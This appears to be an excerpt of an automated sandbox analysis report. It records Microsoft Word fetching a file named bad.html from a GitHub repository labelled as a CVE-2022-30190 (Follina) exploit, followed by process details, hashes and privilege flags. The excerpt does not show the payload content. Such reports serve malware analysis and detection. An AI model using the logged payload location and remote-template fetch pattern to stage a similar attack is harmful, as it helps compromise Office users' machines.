X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: raw.githubusercontent.com
2022-08-18 01:57:09 UTC | 74 | IN | HTTP/1.1 403 Forbidden
Connection: close
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 0
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'
Accept-Ranges: bytes
Date: Thu, 18 Aug 2022 01:57:09 GMT
Via: 1.1 varnish
X-Served-By: cache-mxp6950-MXP
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1660787830.911926,VS0,VE9
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 90f3b6f9be95938ba8c5b82af688f9434fb26d83
Expires: Thu, 18 Aug 2022 02:02:09 GMT
Vary: Authorization,Accept-Encoding
transfer-encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49711 | 185.199.108.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:10 UTC | 85 | OUT | HEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: raw.githubusercontent.com
2022-08-18 01:57:10 UTC | 85 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
Accept-Ranges: bytes
Date: Thu, 18 Aug 2022 01:57:10 GMT
Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6956-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                        X-Timer: S1660787830.028214,VS0,VE0
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: c51a7588355283b280daf7ac0379487c3b85e255
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:10 GMT
                                                                                                                                                                                                                                        Source-Age: 4


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.4 | 49712 | 185.199.109.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:10 UTC | 86 | OUT | GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
2022-08-18 01:57:10 UTC | 87 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 8226
                                                                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        ETag: "e354a911960708e3440f84ea636df58339a30e9db3fd96e7dc79f2ba014824d1"
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:51884D:55A9F9:62FD9C75
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:10 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6949-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                        X-Timer: S1660787830.106222,VS0,VE1
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: a1a05a1c6c3bb0edbcde9fa8ea2586b3ac5fee83
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:10 GMT
                                                                                                                                                                                                                                        Source-Age: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.4 | 49713 | 185.199.109.133 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 01:57:10 UTC | 95 | OUT | HEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
2022-08-18 01:57:10 UTC | 96 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:10 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6925-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 2
                                                                                                                                                                                                                                        X-Timer: S1660787830.367433,VS0,VE0
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: f1cb60f7c941317068e3e73d7fbbe8ce8a5f2458
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:10 GMT
                                                                                                                                                                                                                                        Source-Age: 5



                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:03:56:59
                                                                                                                                                                                                                                        Start date:18/08/2022
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                                                                        Imagebase:0x320000
                                                                                                                                                                                                                                        File size:1937688 bytes
                                                                                                                                                                                                                                        MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:03:57:04
                                                                                                                                                                                                                                        Start date:18/08/2022
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                                                                                        Imagebase:0x960000
                                                                                                                                                                                                                                        File size:466688 bytes
                                                                                                                                                                                                                                        MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                        No disassembly